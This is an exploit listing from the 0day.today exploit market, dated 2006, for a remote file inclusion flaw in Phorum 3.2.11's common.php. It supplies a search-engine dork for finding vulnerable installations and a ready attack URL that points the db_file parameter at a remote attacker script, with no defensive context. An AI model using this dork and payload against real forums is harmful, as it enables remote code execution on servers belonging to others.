[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

Author
Mr-m07
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1236
Category
web applications
Date add
06-12-2006
Platform
unsorted
===============================================================
Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
===============================================================



===========================================================
Yee7TeaM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
===========================================================



#  0day.today [2024-11-15]  #